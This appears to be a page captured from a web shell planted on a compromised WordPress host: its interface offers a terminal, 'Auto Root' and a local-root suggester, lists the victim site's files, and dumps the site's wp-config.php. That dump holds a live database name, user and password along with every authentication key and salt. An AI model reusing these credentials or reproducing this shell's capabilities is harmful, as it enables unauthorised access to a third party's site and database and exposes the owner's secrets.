Linux s17.hosterpk.com 6.12.0-124.55.3.el10_1.x86_64 #1 SMP PREEMPT_DYNAMIC Thu May 7 16:54:02 EDT 2026 x86_64
LiteSpeed
Server IP : 192.169.89.90 & Your IP : 216.73.216.41
Domains :
Cant Read [ /etc/named.conf ]
User : hamzalar
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home4 /
hamzalar /
huruzstudios.com /
Delete
Unzip
Name
Size
Permission
Date
Action
.well-known
[ DIR ]
drwxr-xr-x
2024-07-09 11:52
354967
[ DIR ]
drwxr-xr-x
2026-04-20 09:17
cgi-bin
[ DIR ]
drwxr-xr-x
2026-04-02 18:34
wp-admin
[ DIR ]
drwxr-xr-x
2026-04-02 18:33
wp-content
[ DIR ]
drwxr-xr-x
2026-04-02 18:33
wp-includes
[ DIR ]
drwxr-xr-x
2026-04-02 18:33
.htaccess
478
B
-r--r--r--
2026-05-29 12:52
error_log
149.56
KB
-rw-r--r--
2026-03-09 10:16
health.php
8.2
KB
-rw-r--r--
2026-03-12 21:02
index.php
405
B
-rw-r--r--
2020-02-06 12:03
license.txt
19.44
KB
-rw-r--r--
2025-12-12 05:24
readme.html
7.25
KB
-rw-r--r--
2026-02-04 07:38
wp-activate.php
7.18
KB
-rw-r--r--
2025-12-12 05:24
wp-blog-header.php
351
B
-rw-r--r--
2026-04-02 18:33
wp-comments-post.php
2.27
KB
-rw-r--r--
2023-06-14 19:41
wp-config-sample.php
3.26
KB
-rw-r--r--
2025-12-12 05:24
wp-config.php
3.14
KB
-rw-r--r--
2024-07-17 07:58
wp-cron.php
5.49
KB
-rw-r--r--
2026-04-02 18:33
wp-links-opml.php
2.43
KB
-rw-r--r--
2025-12-12 05:24
wp-load.php
3.84
KB
-rw-r--r--
2024-07-17 07:59
wp-login.php
50.23
KB
-rw-r--r--
2025-12-12 05:24
wp-mail.php
8.52
KB
-rw-r--r--
2025-12-12 05:24
wp-settings.php
30.33
KB
-rw-r--r--
2025-12-12 05:24
wp-signup.php
33.71
KB
-rw-r--r--
2025-04-16 05:40
wp-trackback.php
5.09
KB
-rw-r--r--
2025-12-12 05:24
xmlrpc.php
3.13
KB
-rw-r--r--
2025-04-16 05:40
Save
Rename
<?php /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the installation. * You don't have to use the website, you can copy this file to "wp-config.php" * and fill in the values. * * This file contains the following configurations: * * * Database settings * * Secret keys * * Database table prefix * * ABSPATH * * @link https://wordpress.org/documentation/article/editing-wp-config-php/ * * @package WordPress */ // ** Database settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', 'hamzalar_wp114' ); /** Database username */ define( 'DB_USER', 'hamzalar_wp114' ); /** Database password */ define( 'DB_PASSWORD', 'o9]f6KSeS7p[-(-Q' ); /** Database hostname */ define( 'DB_HOST', 'localhost' ); /** Database charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8' ); /** The database collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /**#@+ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to log in again. * * @since 2.6.0 */ define( 'AUTH_KEY', 'm48p6nbnxb78dwoiycsbidpccuvqcj8yh3mevok9k43fmy2spze3eeusqn7yfkxf' ); define( 'SECURE_AUTH_KEY', '6yo43ljpb9rkvznja12wfo7l2clnuzxminu7xhwfucyke8kxuquw6001mgmx4emx' ); define( 'LOGGED_IN_KEY', '1k99kojlmuehpeurijdh5apzydf6nm4lfbddgxexlg5r8s2owehgmdbryum2eswc' ); define( 'NONCE_KEY', 'yga16bxy3lsq8k3enzawhgsajeiu8ykfyvczagoxg3vpom8gom1wmog5wtc0sq5k' ); define( 'AUTH_SALT', 'xrgayj5kypoxqzv90rdgtufv9s6h2xzhuymhn0krnsk5iw2kq3pgi1gbzlndrtml' ); define( 'SECURE_AUTH_SALT', 'nuuhmygzgs1njqrwca6laddop7pcivri6gefo9zvhajtkwuoraiwsj1wutfsk90r' ); define( 'LOGGED_IN_SALT', 's6entmldp3yljlmqsqpazfugxjof1wzo0awyxuiole07cdyjt7llwo3pgz4fgpjn' ); define( 'NONCE_SALT', 'kz88qboneyphog2wdnzfvnm3vzjcbhtjct2cmomyux0ir55l0h3zkcuxrobtbzql' ); /**#@-*/ /** * WordPress database table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'wpbb_'; /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://wordpress.org/documentation/article/debugging-in-wordpress/ */ define( 'WP_DEBUG', false ); /* Add any custom values between this line and the "stop editing" line. */ /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php';